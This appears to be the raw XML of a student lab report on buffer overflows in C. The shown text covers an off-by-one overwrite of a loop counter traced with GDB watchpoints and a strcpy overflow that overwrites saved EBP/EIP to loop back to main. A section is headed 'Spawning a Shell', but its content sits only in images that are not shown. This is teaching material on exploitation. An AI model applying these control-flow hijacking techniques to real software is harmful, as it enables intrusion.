                          <a:ext cx="5940424" cy="1181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93.04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40FBD1B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t xml:space="preserve">Likely </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sits immediately after buf in memory, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">buf[16]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is physically the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">exact same memory address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the first byte of i.</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77F67DE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207252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9470" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId26"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="20725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163.19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268DCB9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16851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6198" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId27"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="1168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92.01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556D178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t xml:space="preserve">Below I have overwrite i with a value &gt;16 (17th char, str[16] == ‘A’) to satisfy the condition.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66075AC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30238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42644" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId28"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="302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23.81pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId28" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC3C7C3">
      <w:pPr>
        <w:pStyle w:val="834"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">GDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="667EB3F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rPr>
        <w:t xml:space="preserve">To prove this is happening without looking at assembly, we are going to use an amazing GDB feature called a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Watchpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. A watchpoint tells the debugger: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"I don't care what line of code we are on, pause the program immediately if the value of this specific variable changes."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AA63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t xml:space="preserve">We will </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">continue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or c) repeatedly,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> every time i++ happens, GDB will pause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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D96F06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2992289"/>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8436" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId29"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="29922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235.61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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC128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highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">i  is incremented from 0 to 16 inside of the for() condition. But on this last iteration (the 17th), i will also be modified inside the block </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">buf[16] = str[16];</w:t>
      </w:r>
      <w:r>
        <w:rPr>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color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of i becoming 17,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> i become 0 because of the null byte of the input str.</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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FFDF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517AA27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5CF8738B">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="nil" w:color="auto"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:br w:type="page" w:clear="all"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1262CC95">
      <w:pPr>
        <w:pStyle w:val="833"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Infinite Loop by Overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAED7A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highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="241668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8885" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId30"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="241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75pt;height:190.29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br/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="2959863"/>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1946" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId31"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="2959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5pt;height:233.06pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId31"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111081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77274" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId32"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="11108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87.47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14:paraId="07C1CCF8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">You should be able to provoke an infinite loop in the code by using an overflow of the strcpy function inside "foo" to overwrite the EBP and EIP values on the stack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA6E2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4730115" cy="283886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7223" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId33"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="4730114" cy="2838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72.45pt;height:223.53pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId33" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="5267766E">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>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637303"/>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2035" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId34"/>
                        <a:srcRect l="0" t="60496" r="0" b="0"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="6373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50.18pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId34" o:title="" croptop="39647f" cropleft="0f" cropbottom="0f" cropright="0f"/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D697D7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">When foo finishes, it will pop our fake EIP into the instruction pointer, and the CPU will blindly execute whatever is there.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F11339">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="4769684"/>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98380" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId35"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="4769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75pt;height:375.57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r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0AF10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highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="2780105"/>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68938" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId36"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="27801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75pt;height:218.91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r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C38AF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>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4451751"/>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6822" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId37"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="44517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350.53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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="162059C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highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">We we can see the stack of foo, we have overwrite eip with address of beginning of main, causing the loop.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="216EC5E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440690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52719" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId38"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="4406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75pt;height:347.00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
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F22AC61">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="583009F1">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="nil"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page" w:clear="all"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCFA2D">
      <w:pPr>
        <w:pStyle w:val="833"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">6 Spawning a Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C1599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highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="839636"/>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41" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId39"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="839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7.75pt;height:66.11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r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4FFF4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4656846" cy="1650112"/>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05859" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId40"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="4656845" cy="1650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66.68pt;height:129.93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highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE6D98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847601"/>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37128" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId41"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="184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7.75pt;height:145.48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highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ECD27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210172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60357" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId42"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="2101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7.75pt;height:165.49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highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D41EAD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2918338"/>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08758" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId43"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
